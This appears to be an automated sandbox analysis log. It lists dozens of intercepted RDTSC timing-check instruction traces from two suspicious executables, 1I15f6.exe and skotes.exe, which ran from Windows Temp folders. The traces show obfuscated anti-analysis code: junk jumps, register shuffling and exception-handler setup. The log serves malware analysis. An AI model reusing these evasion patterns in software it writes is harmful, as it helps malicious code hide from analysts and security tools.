                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30E22 second address: 4D30E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3EC5BEA2h 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1C54A6E9Bh 0x00000016 sbb cl, FFFFFF9Eh 0x00000019 jmp 00007FA1C54A6EA9h 0x0000001e popfd 0x0000001f call 00007FA1C54A6EA0h 0x00000024 call 00007FA1C54A6EA2h 0x00000029 pop eax 0x0000002a pop edx 0x0000002b popad 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FA1C54A6E9Dh 0x00000034 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30E90 second address: 4D30E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30B81 second address: 4D30B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D30B87 second address: 4D30B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DB0720 second address: 4DB0740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1C54A6EA1h 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov cl, 37h 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DB0740 second address: 4DB0798 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 6070AE36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA1C45142A7h 0x0000000f and ecx, 15E556BEh 0x00000015 jmp 00007FA1C45142A9h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov dl, ah 0x00000020 mov cx, dx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushad 0x00000028 mov cl, dl 0x0000002a mov ax, A3EFh 0x0000002e popad 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DB0798 second address: 4DB07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1C54A6EA6h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DB07B9 second address: 4DB07C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DB07C8 second address: 4DB07E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6EA4h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0750 second address: 4DA0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0756 second address: 4DA0780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1C54A6EA7h 0x00000011 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0780 second address: 4DA07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d jmp 00007FA1C45142A3h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA1C45142A0h 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA07CA second address: 4DA07D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA07D0 second address: 4DA07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1C451429Ah 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA07F2 second address: 4DA07F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA07F6 second address: 4DA07FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4012B second address: 4D4012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4012F second address: 4D40135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40135 second address: 4D4013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4013B second address: 4D4013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4013F second address: 4D4015D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4015D second address: 4D4017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, 3D46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1C451429Fh 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D4017D second address: 4D40181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D40181 second address: 4D40187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0B67 second address: 4DA0B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0B6D second address: 4DA0B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4DA0B71 second address: 4DA0BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1C54A6EA5h 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 8C9570 second address: 8C9582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C451429Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D507CF second address: 4D50864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FA1C54A6EA2h 0x0000000d push eax 0x0000000e jmp 00007FA1C54A6E9Bh 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov dx, si 0x00000018 mov di, ax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f jmp 00007FA1C54A6EA8h 0x00000024 mov bh, ah 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 jmp 00007FA1C54A6E9Dh 0x0000002e push 04444059h 0x00000033 jmp 00007FA1C54A6EA7h 0x00000038 xor dword ptr [esp], 72BD8041h 0x0000003f pushad 0x00000040 mov edx, ecx 0x00000042 movzx eax, dx 0x00000045 popad 0x00000046 call 00007FA1C54A6E99h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50864 second address: 4D50868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50868 second address: 4D5086E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D5086E second address: 4D50877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 26D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50877 second address: 4D508CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FA1C54A6EA4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FA1C54A6E9Bh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FA1C54A6EA9h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA1C54A6E9Ch 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D508CF second address: 4D508D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D508D7 second address: 4D50982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jmp 00007FA1C54A6EA6h 0x0000000d mov eax, dword ptr fs:[00000000h] 0x00000013 jmp 00007FA1C54A6EA0h 0x00000018 nop 0x00000019 jmp 00007FA1C54A6EA0h 0x0000001e push eax 0x0000001f jmp 00007FA1C54A6E9Bh 0x00000024 nop 0x00000025 jmp 00007FA1C54A6EA6h 0x0000002a sub esp, 1Ch 0x0000002d jmp 00007FA1C54A6EA0h 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 mov ebx, ecx 0x00000036 jmp 00007FA1C54A6E9Ah 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007FA1C54A6E9Bh 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA1C54A6EA0h 0x0000004c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50982 second address: 4D50988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50988 second address: 4D50999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1C54A6E9Dh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50999 second address: 4D5099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D5099D second address: 4D509B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov ecx, 1F2CA7EFh 0x0000000f push eax 0x00000010 push edx 0x00000011 movzx eax, di 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D509B1 second address: 4D50A2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a jmp 00007FA1C45142A9h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FA1C451429Eh 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, si 0x0000001a mov bx, si 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 pushfd 0x00000024 jmp 00007FA1C451429Eh 0x00000029 add cx, 4AD8h 0x0000002e jmp 00007FA1C451429Bh 0x00000033 popfd 0x00000034 popad 0x00000035 mov eax, dword ptr [76FBB370h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA1C45142A5h 0x00000041 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50A2E second address: 4D50A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d call 00007FA1C54A6E9Ch 0x00000012 pop ebx 0x00000013 pushfd 0x00000014 jmp 00007FA1C54A6E9Eh 0x00000019 add cx, 0EC8h 0x0000001e jmp 00007FA1C54A6E9Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xor eax, ebp 0x00000027 pushad 0x00000028 mov ax, di 0x0000002b call 00007FA1C54A6EA1h 0x00000030 mov dx, ax 0x00000033 pop eax 0x00000034 popad 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50A98 second address: 4D50A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50A9C second address: 4D50AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50AA0 second address: 4D50AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50AA6 second address: 4D50AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50AAC second address: 4D50ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1C45142A1h 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50ACA second address: 4D50B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 8582h 0x00000007 jmp 00007FA1C54A6EA3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA1C54A6EA1h 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B01 second address: 4D50B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B08 second address: 4D50B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr fs:[00000000h], eax 0x0000000d pushad 0x0000000e jmp 00007FA1C54A6EA2h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007FA1C54A6EA0h 0x0000001b sbb esi, 4CA1DDD8h 0x00000021 jmp 00007FA1C54A6E9Bh 0x00000026 popfd 0x00000027 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B4D second address: 4D50B7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C45142A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov di, C650h 0x00000014 mov edx, 6A77F77Ch 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B7A second address: 4D50B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B80 second address: 4D50B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B84 second address: 4D50B88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50B88 second address: 4D50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b jmp 00007FA1C45142A8h 0x00000010 test eax, eax 0x00000012 jmp 00007FA1C45142A0h 0x00000017 jne 00007FA2366833FDh 0x0000001d pushad 0x0000001e jmp 00007FA1C451429Dh 0x00000023 popad 0x00000024 sub eax, eax 0x00000026 jmp 00007FA1C45142A7h 0x0000002b mov dword ptr [ebp-20h], eax 0x0000002e jmp 00007FA1C45142A6h 0x00000033 mov ebx, dword ptr [esi] 0x00000035 jmp 00007FA1C45142A0h 0x0000003a mov dword ptr [ebp-24h], ebx 0x0000003d jmp 00007FA1C45142A0h 0x00000042 test ebx, ebx 0x00000044 jmp 00007FA1C45142A0h 0x00000049 je 00007FA2366832D8h 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FA1C451429Eh 0x00000056 xor si, 5678h 0x0000005b jmp 00007FA1C451429Bh 0x00000060 popfd 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50C64 second address: 4D507CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp ebx, FFFFFFFFh 0x0000000a jmp 00007FA1C54A6EA7h 0x0000000f jmp 00007FA237615E8Ch 0x00000014 jne 00007FA1C54A6EB9h 0x00000016 xor ecx, ecx 0x00000018 mov dword ptr [esi], ecx 0x0000001a mov dword ptr [esi+04h], ecx 0x0000001d mov dword ptr [esi+08h], ecx 0x00000020 mov dword ptr [esi+0Ch], ecx 0x00000023 mov dword ptr [esi+10h], ecx 0x00000026 mov dword ptr [esi+14h], ecx 0x00000029 mov ecx, dword ptr [ebp-10h] 0x0000002c mov dword ptr fs:[00000000h], ecx 0x00000033 pop ecx 0x00000034 pop edi 0x00000035 pop esi 0x00000036 pop ebx 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a retn 0004h 0x0000003d nop 0x0000003e pop ebp 0x0000003f ret 0x00000040 add esi, 18h 0x00000043 pop ecx 0x00000044 cmp esi, 007156A8h 0x0000004a jne 00007FA1C54A6E80h 0x0000004c push esi 0x0000004d call 00007FA1C54A7703h 0x00000052 push ebp 0x00000053 mov ebp, esp 0x00000055 push dword ptr [ebp+08h] 0x00000058 call 00007FA1C9B2A69Fh 0x0000005d mov edi, edi 0x0000005f pushad 0x00000060 movzx eax, bx 0x00000063 push eax 0x00000064 push edx 0x00000065 mov bl, B0h 0x00000067 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50179 second address: 4D5017F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D5017F second address: 4D50207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FA1C54A6EA0h 0x0000000b and cx, AB78h 0x00000010 jmp 00007FA1C54A6E9Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FA1C54A6EA4h 0x00000021 xor ch, FFFFFFD8h 0x00000024 jmp 00007FA1C54A6E9Bh 0x00000029 popfd 0x0000002a movzx esi, di 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA1C54A6EA0h 0x00000036 sbb eax, 0BF89038h 0x0000003c jmp 00007FA1C54A6E9Bh 0x00000041 popfd 0x00000042 movzx esi, di 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a mov bx, si 0x0000004d mov bx, cx 0x00000050 popad 0x00000051 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50207 second address: 4D5020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D5020D second address: 4D50211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50211 second address: 4D5024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FA1C451429Fh 0x00000013 adc cl, 0000005Eh 0x00000016 jmp 00007FA1C45142A9h 0x0000001b popfd 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D5024B second address: 4D50299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1C54A6EA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov si, 2117h 0x0000000e pushfd 0x0000000f jmp 00007FA1C54A6E9Ch 0x00000014 sbb ax, 7E88h 0x00000019 jmp 00007FA1C54A6E9Bh 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA1C54A6EA0h 0x0000002b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeRDTSC instruction interceptor: First address: 4D50299 second address: 4D5029F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 67EC8C second address: 67ECCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA1C54A6E98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007FA1C54A6EA7h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jmp 00007FA1C54A6EA4h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 7F39FF second address: 7F3A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1C45142A5h 0x00000009 popad 0x0000000a jmp 00007FA1C45142A4h 0x0000000f rdtsc
